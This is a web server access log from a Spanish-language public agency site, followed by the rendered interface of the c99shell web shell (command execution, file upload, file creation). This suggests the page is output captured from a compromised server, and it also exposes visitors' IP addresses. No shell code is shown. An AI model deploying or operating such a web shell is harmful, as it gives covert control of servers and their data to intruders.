186.102.36.233 - - [28/Oct/2023:23:42:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/Nq9922rKXtosCQVWaYu0W4kSe1wg46DbAccFlaPjXHYXVVcNWj+D+zhWi4tc9xNxxtUglJYGS92052Yx4K2fNQViGv3ghzqahRmW2eNPDdVXqffMzDBXNyox/WU4fnqgatEUt+3YUYQwT9bNlRb3byOIN/xEx5jA=&u=U2FsdGVkX1+ObvTWtjJg5uWHtemq2dU+yAXjDMkjuwxhcUWOVdz6NhPwWOYfV20/&y=U2FsdGVkX1+dz3mJI5QhVmLT9pNp058QdJzx9agHb5mbNvQrcEcR6Ry1JhCal1As HTTP/1.1" 200 26
186.102.36.233 - - [28/Oct/2023:23:42:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+px5iGXlFsdwE7A+AZImJwGUbr5yQr59dcNgXHtjL73Bs1+GsVV8xBG7jHBgn1HhK0NxE+CUHRFkAUhbw3fsXfa0mwMWmb/1B2yonY9Gs+PMkrBs6bUv/IVFNrgCLCixBzKfuYaprXKUB2z9JYWFNXP/O1XUu8geIjHyxk6RC8aSRXG1RXZL/yV4s15ry2c88fTHtypL4qBQ==&u=U2FsdGVkX1+ObvTWtjJg5uWHtemq2dU+yAXjDMkjuwxhcUWOVdz6NhPwWOYfV20/&y=U2FsdGVkX1+dz3mJI5QhVmLT9pNp058QdJzx9agHb5mbNvQrcEcR6Ry1JhCal1As HTTP/1.1" 200 26
172.22.2.4 - - [28/Oct/2023:23:43:12 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [28/Oct/2023:23:41:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:23:43:22 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=PEV&fecha=2023&resuelve=inicio HTTP/1.1" 200 288151
172.22.2.4 - - [28/Oct/2023:23:43:22 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [28/Oct/2023:23:43:22 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
117.62.235.53 - - [28/Oct/2023:23:43:23 -0500] "GET / HTTP/1.1" 200 319
40.77.167.77 - - [28/Oct/2023:23:43:29 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
173.252.79.5 - - [28/Oct/2023:23:43:31 -0500] "GET /images/cuerpos%20de%20agua%20en%20humedales-19-10.jpg HTTP/1.1" 200 73528
172.22.2.4 - - [28/Oct/2023:23:42:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60331
216.245.221.92 - - [28/Oct/2023:23:44:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:23:45:06 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=PEV&fecha=2023&resuelve=administrativo HTTP/1.1" 200 9031
201.221.172.18 - - [28/Oct/2023:23:45:32 -0500] "GET /BLA/resoluciones/AUTOS%202023/3961.pdf HTTP/1.1" 200 478933
201.245.192.253 - - [28/Oct/2023:23:45:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
201.221.172.18 - - [28/Oct/2023:23:45:44 -0500] "GET /BLA/resoluciones/AUTOS%202023/0334.pdf HTTP/1.1" 200 353952
201.221.172.18 - - [28/Oct/2023:23:45:52 -0500] "GET /BLA/resoluciones/AUTOS%202023/0419.pdf HTTP/1.1" 200 463306
52.167.144.67 - - [28/Oct/2023:23:46:01 -0500] "GET /robots.txt HTTP/1.1" 404 1018
216.244.66.195 - - [28/Oct/2023:23:46:20 -0500] "GET /robots.txt HTTP/1.1" 404 1018
40.77.167.59 - - [28/Oct/2023:23:46:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1048.pdf HTTP/1.1" 200 119500
40.77.167.59 - - [28/Oct/2023:23:48:36 -0500] "GET /BLA/resoluciones/AUTOS%202023/0772.pdf HTTP/1.1" 200 448261
172.22.2.4 - - [28/Oct/2023:23:47:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Oct/2023:23:49:28 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.12 - - [28/Oct/2023:23:49:42 -0500] "GET /BLA/resoluciones/AUTOS%202023/4314.pdf HTTP/1.1" 200 1161185
172.22.2.4 - - [28/Oct/2023:23:48:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60682
201.245.192.253 - - [28/Oct/2023:23:50:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
66.249.77.8 - - [28/Oct/2023:23:50:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4349.pdf HTTP/1.1" 200 558291
172.22.2.4 - - [28/Oct/2023:23:51:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=PEV&fecha=2023&resuelve=valtec HTTP/1.1" 200 626
172.22.2.4 - - [28/Oct/2023:23:51:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=PEV&fecha=2023&resuelve=outdoor HTTP/1.1" 200 626
172.22.2.4 - - [28/Oct/2023:23:52:01 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=PEV&fecha=2023&resuelve=outdoor HTTP/1.1" 200 626
172.22.2.4 - - [28/Oct/2023:23:52:08 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=PEV&fecha=2022&resuelve=valtec HTTP/1.1" 200 626
172.22.2.4 - - [28/Oct/2023:23:52:23 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=PEV&fecha=2022&resuelve=administrativo HTTP/1.1" 200 8306
66.249.66.167 - - [28/Oct/2023:23:53:38 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
66.249.66.167 - - [28/Oct/2023:23:53:41 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
66.249.66.167 - - [28/Oct/2023:23:53:41 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
216.245.221.92 - - [28/Oct/2023:23:54:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:23:53:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Oct/2023:23:55:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
172.22.2.4 - - [28/Oct/2023:23:54:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56310
40.77.167.53 - - [28/Oct/2023:23:55:58 -0500] "GET /BLA/resoluciones/AUTOS%202023/5171.pdf HTTP/1.1" 200 452541
216.245.221.92 - - [28/Oct/2023:23:59:28 -0500] "HEAD / HTTP/1.1" 200 -

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.078 ]--